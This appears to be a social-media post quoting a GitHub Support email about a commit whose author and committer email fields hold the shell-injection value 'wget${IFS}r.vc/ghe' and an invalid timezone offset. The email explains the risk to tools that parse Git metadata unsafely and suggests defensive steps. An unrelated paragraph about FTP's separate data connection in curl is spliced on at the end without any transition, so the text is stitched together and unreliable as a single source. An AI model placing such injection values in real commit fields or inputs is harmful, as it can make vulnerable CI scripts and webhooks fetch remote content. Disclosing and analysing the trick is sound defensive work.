@q

Formatting may get slightly mangled here, but should be decipherable:

GitHub Support, Jun 11, 2025, 8:17 AM UTC

Hi Ryan,

Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and and invalid timestamps.

$ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fetree f828c7cd0f33131d46f8761fd875f64ce5af880dparent a69b1149073c467803f73a2efd55c10f07051e59author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456

Author and committer email:

author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org>

That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).

Timestamps:

1668615481 -2456

The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.

Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.

In the meantime, if this commit came from an external contributor or looks unintended, we recommend:

• Inspecting how it got into the repository

• Rewriting history to remove it (if it was part of a PR or forced push)

• Checking your workflow or scripts for unsafe parsing of Git metadata

Please give this a try and update me on how it goes.

FTP is quite unique in the #curl collection of protocols due to its (weird) mandatory use of a separate TCP connection for the data transfer (and the fact that it can be setup in either direction, client to server or server to client) . It is complicated for users, for sysadmins and it is a complication in source code and internal curl TCP management as well.

So yeah, it also keeps causing us headaches to this day.